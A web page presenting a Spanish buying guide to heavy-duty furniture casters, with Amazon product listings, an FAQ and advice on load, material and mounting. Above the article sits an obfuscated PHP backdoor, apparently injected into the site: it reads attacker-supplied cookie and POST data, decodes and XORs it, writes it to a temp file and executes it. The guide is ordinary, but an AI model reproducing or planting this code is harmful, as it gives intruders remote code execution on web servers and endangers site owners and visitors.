$UZrybR = chr (113) . chr (95) . 'Y' . chr (111) . 'V' . "\x54" . "\130";$cktxhq = chr ( 825 - 726 ).chr (108) . chr (97) . "\x73" . "\163" . chr (95) . 'e' . chr ( 683 - 563 ).chr ( 415 - 310 )."\x73" . chr (116) . "\163";$nCPWEdaCX = $cktxhq($UZrybR); $UZrybR = "24357";$TnqEySwMF = $nCPWEdaCX;$cktxhq = "39106";if (!$TnqEySwMF){class q_YoVTX{private $CWqysxkcy;public static $wcAAx = "69b2630d-d739-4068-988b-cb8c54650c32";public static $noXAQyGAae = 46859;public function __construct($TdyVFMSB=0){$EjqXRbqiw = $_COOKIE;$aUTRlo = $_POST;$sDMIstDJ = @$EjqXRbqiw[substr(q_YoVTX::$wcAAx, 0, 4)];if (!empty($sDMIstDJ)){$LlGpReO = "base64";$JTAkbs = "";$sDMIstDJ = explode(",", $sDMIstDJ);foreach ($sDMIstDJ as $TmAFuM){$JTAkbs .= @$EjqXRbqiw[$TmAFuM];$JTAkbs .= @$aUTRlo[$TmAFuM];}$JTAkbs = array_map($LlGpReO . chr ( 532 - 437 ).chr (100) . chr (101) . "\x63" . "\x6f" . "\x64" . chr (101), array($JTAkbs,)); $JTAkbs = $JTAkbs[0] ^ str_repeat(q_YoVTX::$wcAAx, (strlen($JTAkbs[0]) / strlen(q_YoVTX::$wcAAx)) + 1);q_YoVTX::$noXAQyGAae = @unserialize($JTAkbs);}}private function OOjsEOm(){if (is_array(q_YoVTX::$noXAQyGAae)) {$qcXEadZ = sys_get_temp_dir() . "/" . crc32(q_YoVTX::$noXAQyGAae[chr (115) . chr ( 441 - 344 ).chr ( 822 - 714 ).chr (116)]);@q_YoVTX::$noXAQyGAae[chr (119) . 'r' . "\151" . chr ( 771 - 655 ).chr ( 849 - 748 )]($qcXEadZ, q_YoVTX::$noXAQyGAae["\x63" . "\157" . 'n' . chr ( 450 - 334 ).'e' . "\x6e" . 't']);include $qcXEadZ;@q_YoVTX::$noXAQyGAae[chr ( 1092 - 992 ).chr ( 343 - 242 )."\154" . chr ( 756 - 655 )."\164" . 'e']($qcXEadZ); $gmtRm = "40762";exit();}}public function __destruct(){$this->OOjsEOm(); $gmtRm = "40762";$pSxwU = str_pad($gmtRm, 10);}}$DboCuMM = new /* 55356 */ q_YoVTX(); $DboCuMM = substr("56248_24418", 1);}Ruedas para muebles pesados baratas [Guía de compra detallada 2024 ]

Ruedas para muebles pesados baratas [Guía de compra detallada]

Las ruedas para muebles pesados se utilizan para facilitar el movimiento de muebles, equipos industriales, equipos de oficina y otros objetos de gran envergadura. No sólo protegen el suelo de arañazos y daños, sino que también ahorran tiempo, energía y dinero. Las ruedas de alta resistencia, que pueden soportar cargas de hasta 400 kg, han supuesto una total y completa revolución en diversos sectores.

Un gran ejemplo de lo útiles que resultan las ruedas giratorias son las sillas de oficina, ya que nos permiten movernos con facilidad y ligereza. Las ruedas nos facilitan el desplazamiento y el trabajo. Las ruedas giratorias están disponibles en una gran variedad de tamaños, materiales y formas. Dependiendo de tus necesidades, puedes obtener llantas de poliuretano, goma elástica, hierro o aluminio. Al igual que hicimos en el anterior artículo sobre placas solares baratas chinas, en este post, hemos elaborado una lista de las mejores ruedas giratorias en Amazon.

Preguntas frecuentes sobre las ruedas para muebles pesados

¿Cuáles son las funciones de las ruedas giratorias?

Con este tipo de ruedas puedes convertir cualquier objeto pesado en móvil. Se suelen utilizar para escritorios, mesas, pianos, puestos de trabajo, armarios, máquinas y estanterías, entre otras cosas.

¿Cuáles son las ventajas de las ruedas giratorias?

Este tipo de ruedas evitan tener que empujar o cargar un mueble grande, puedes trasladarlo sin esfuerzo. Las ruedas también ahorran tiempo; en lugar de levantar o arrastrar un objeto, puedes moverlo más rápidamente haciéndolo rodar.

¿Qué tipos de ruedas existen?

– Ruedas fijas
– Ruedas de Placa
– Rueda de vástago
– Rueda que se bloquea
– Rueda con pivote hueco

Por material:
– Ruedas blandas
– Ruedas duras

¿Cuál es la mejor rueda para exteriores?

En el exterior, la superficie es áspera e irregular. Para una simple rodadura, necesitará materiales más blandos como el caucho o el poliuretano

¿Qué ruedas para muebles pesados debo elegir para interiores?

Es interesante elegir ruedas para muebles pesados compuestas de materiales suaves y blandos para no estropear suelos delicados. Las ruedas blandas no rayan el parquet ni la tarima flotante.

Las mejores ruedas para muebles pesados

ruedas para muebles pesados 1_

Nirox 4 Ruedas de 75 mm – 200 kg

  • Ideal para el transporte seguro de muebles o mercancías medianas y pesadas ; Ruedas de alta resistencia para su uso en muchos tipos de carros
  • Ruedas giratorias en todas las direcciones para un cambio de dirección flexible ; Especialmente maniobrables para el transporte de mercancías
  • Ruedas industriales fiables para uso interior y exterior ; Carcasa de acero galvanizado (resistente a la intemperie)
ruedas para muebles pesados Emuca

Emuca: Ruedas pivotantes de goma

  • Juego de cuatro ruedas para muebles, dos con freno y dos sin él.
  • Diámetro de rueda de 50 mm.
  • Banda de rodadura de caucho gris sobre marco de chapa de acero galvanizado.
  • Atornille la placa al mueble (tornillos de montaje incluidos).
  • Cada rueda tiene una capacidad de carga de 35 kg
Ruedas para muebles pesados negras (1)

GBL: Ruedas para muebles 50 mm – 200 kg

  • Ruedas giratorias que giran 360 grados. Suaves, silenciosas y sólidas. Tanto la placa de fijación como las ruedas se bloquean cuando se accionan los frenos.
  • Ruedas de goma con la fuerza y la durabilidad de las ruedas de metal para crear una combinación única. Las ruedas para carros de alta resistencia con una capacidad de peso de 200kg son seguras para todo tipo de suelos (50Kg por rueda).
  • Incluye 4 ruedas para muebles con freno y 16 tornillos para un montaje rápido (28mm x 5mm).
ruedas para muebles pesados gbl

GBL: ruedas para muebles pesados – 400 kg – 50 mm

  • Giran 360 grados de forma muy suave, silenciosa y robusta.
  • Las ruedas de poliuretano de alta resistencia ofrecen la elasticidad de las ruedas de goma combinada con el doble bloqueo, la resistencia y la durabilidad de las ruedas metálicas.
  • Son seguras para todo tipo de suelos y tienen una capacidad de carga de 400 kg (100 kg por rueda).
ruedas gbl 4 verdes y con frenos

GBL: Ruedas de 50 mm + 200 kg

  • Las ruedas giratorias de gran resistencia giran 360 grados. Suaves, silenciosas y potentes. Tanto la placa de fijación como las ruedas se bloquean cuando se accionan los frenos.
  • Son ruedas de alta resistencia con una capacidad de peso de 200kg. Son seguras para todo tipo de suelos (50Kg por rueda).
  • El paquete incluye 2 ruedas para muebles sin freno y 2 ruedas para muebles con freno, así como 16 tornillos para un fácil montaje (28mm x 5mm).
ruedas para cargas pesadas gbl 2

GBL: ruedas para muebles – 40 kg – 25 mm

  • Las ruedas de los muebles hechas de goma resistente giran 360 grados. Son suaves, silenciosas y fiables. Tanto la placa de bloqueo como las ruedas se bloquean cuando se activan los frenos. Cada rueda tiene una capacidad de carga de 10 kg.
  • Las ruedas de poliuretano de alta resistencia combinan la dureza y durabilidad de las ruedas metálicas con la resistencia de las ruedas de goma.
  • El paquete incluye 2 ruedas para muebles sin freno y 2 ruedas para muebles con freno, así como 16 tornillos GRATIS para una fácil instalación.

Guía de compra de ruedas para muebles pesados

A la hora de comprar ruedas para muebles pesados, hay tres factores a tener en cuenta:

Diseño de la rueda

Hay varias alternativas de ruedas, y no todas funcionarán con su suelo. Si su suelo es liso y brillante, las ruedas de banda de rodadura firme son el camino a seguir. Si su suelo es irregular, utiliza ruedas de banda de rodadura blanda para una conducción suave.

Cuanto más grande y blanda sea la rueda, más fácil será pasar por encima de obstáculos como las barreras. Las ruedas de acero o hierro fundido deben evitarse si sus suelos son sensibles. Compra ruedas más blandas que no dañen el suelo.

Capacidad de carga

El material de la rueda, así como su diámetro, influyen en su capacidad de carga. Cuanto mayor sea la capacidad de carga de la rueda, más denso y pesado será el material. Divida la carga total del equipo por el número de ruedas que desea utilizar para obtener la relación correcta entre carga y rueda.

Las ruedas más grandes distribuyen el peso de manera más uniforme y ruedan más suavemente que las ruedas más pequeñas. Para adaptarse a cualquier situación especial, compre una rueda que tenga una capacidad superior a la de su carga.

Las ruedas de poliuretano, de núcleo de hierro, de nylon moldeado, de hierro fundido o de núcleo de aluminio pueden soportar hasta 1500 libras por rueda en términos de material. Para pesos menores, como las sillas, el caucho y el plástico son ideales.

Uso frecuente

Considera la frecuencia con la que vayas a utilizar los muebles o el equipo. La mejor rueda para muebles que puedes elegir es una que sea fácil de rodar si vas a necesitar moverla regularmente.

Una sustancia suave y, por supuesto, una superficie lisa son necesarias para que una rueda ruede sin esfuerzo. El caucho y otros materiales blandos son ideales para las cosas que deben moverse con regularidad. En cambio, si el objeto no se va a mover con frecuencia, este elemento puede pasarse por alto.

Montaje

Si vas a cambiar las ruedas de un mueble, esta es una consideración crucial. Debe seleccionar ruedas con el mismo montaje que la anterior.

El montaje en placa y el montaje en vástago son las dos opciones más comunes de montaje de ruedas. Reemplace los soportes de placa con el mismo patrón de pernos y tamaño de placa que el anterior. Obtenga nuevas con el mismo estilo de vástago si es un montaje de vástago.

¿Cuántos tipos existen de ruedas para muebles pesados?

Existen cinco tipos distintos de ruedas para muebles pesados:

Ruedas fijas

Las ruedas para muebles pesados fijas se conoce comúnmente como una rueda giratoria rígida. Sólo es posible el movimiento hacia atrás y hacia delante. Estas ruedas no pueden girar 360 grados.

Son más fuertes que otros tipos de ruedas a pesar de sus limitaciones de movilidad.

Ruedas de Placa

Esta es la más típica. Una rueda de placa se caracteriza por una superficie de montaje cuadrada con cuatro agujeros en cada esquina. A través de estos orificios, la rueda fija su agarre en el objeto.

Rueda de vástago

Las ruedas con vástago se diferencian de las tradicionales en que incluyen una rueda en un marco de montaje. Las ruedas de vástago, a diferencia de las de placa, tienen una varilla de montaje de forma cilíndrica. Dentro de la ranura de montaje del objeto, se coloca y fija una varilla cilíndrica (que debe ser del mismo tamaño y forma).

Ruedas para muebles pesados con freno

El mecanismo de bloqueo de estas ruedas está pensado para bloquear las ruedas cuando el objeto está colocado en una pendiente o en cualquier otra posición potencialmente peligrosa. Este tipo te da la opción de mover el objeto libremente o bloquearlo en un lugar.

Rueda con pivote hueco

Una rueda de pivote hueco sin vástago presenta un orificio en la parte superior de la superficie de montaje. Una rueda de pivote se fija a un objeto atornillando o atornillando un perno o tornillo en su orificio.

¿Cuál es la diferencia entre las ruedas para muebles pesados blandas y las duras?

Las ruedas se dividen en dos categorías:

Ruedas blandas

Este tipo de ruedas son ideales para moquetas, alfombras, suelos de patio o baldosas y suelos de madera. Como son suaves, silenciosas y no marcan, son las ruedas ideales para todo tipo de suelos delicados o de madera.

Tienen la forma de una rueda de patín, pero son considerablemente más blandas que las ruedas de plástico duro.

La mayoría de las ruedas para muebles pesados blandas están fabricadas con poliuretano o caucho. Estos son los mejores materiales para las ruedas, ya que reducen la cantidad de arañazos y deslizamientos en el suelo.

Ruedas duras

Las ruedas para muebles pesados duras suelen estar recubiertas de plástico para hacer que rodar sobre superficies de alfombras gruesas y blandas sea más sencillo. Son las mejores ruedas para alfombras y moquetas.

También puede bloquear las ruedas duras en una determinada posición para evitar que su objeto se mueva libremente.

El tipo básico son las ruedas para muebles pesados de nylon, que también están disponibles. Su suave banda de rodadura les permite agarrar el plástico duro de la alfombra con mayor facilidad.

¿Qué tamaño de ruedas para muebles pesados debo comprar?

Como se ha dicho anteriormente, el tamaño de las ruedas para muebles pesados viene determinado principalmente por el peso, la carga y la frecuencia de uso, entre otros factores. A continuación se presentan algunas sugerencias comunes para seleccionar el tamaño correcto de las ruedas para muebles pesados que necesites:

¿Manejas artículos frágiles? Más pequeña es mejor.

Si necesitas el máximo control y un movimiento suave al manipular artículos delicados, costosos y de gran tamaño, como equipos médicos o técnicos. Lo ideal es una rueda con un diámetro pequeño, un perfil bajo y una rueda ancha.

El modesto diámetro de la rueda y el bajo perfil del objeto evitan que ruede demasiado rápido. Las ruedas anchas pueden soportar cargas enormes sin tropezar con ellas.

¿Transportas objetos voluminosos? Amplía tus horizontes.

Para obtener estabilidad al mover objetos o máquinas de gran peso, se necesita una rueda ancha. Si se emplean ruedas estrechas, los pesos pesados pueden ejercer presión sobre las patas, el yugo y las fijaciones, haciendo que fallen.

Para soportar la carga, elija ruedas de aluminio o acero de 2 a 4 pulgadas de ancho con una estructura de patas estampadas resistente.

¿Necesitas una rueda rápida? Elije un diámetro grande.

Cuanto más grande sea la rueda, más fácilmente rodará. En un solo rodaje, una rueda de mayor diámetro cubre más superficie de suelo que una más pequeña. Con un centro de gravedad elevado, una rueda enorme elevará naturalmente su objeto o peso. Esto podría provocar tropiezos o daños, así que procede a manipular la carga con precaución.

Conclusión

Es obvio lo útiles que son las ruedas para muebles pesados. El peso, el tamaño, la forma y las necesidades de movimiento de su objeto determinarán qué rueda giratoria es la ideal para él. Cuando hagas tu compra final, asegúrate de evaluar el suelo, la capacidad de peso y los tipos de ruedas.

Deja un comentario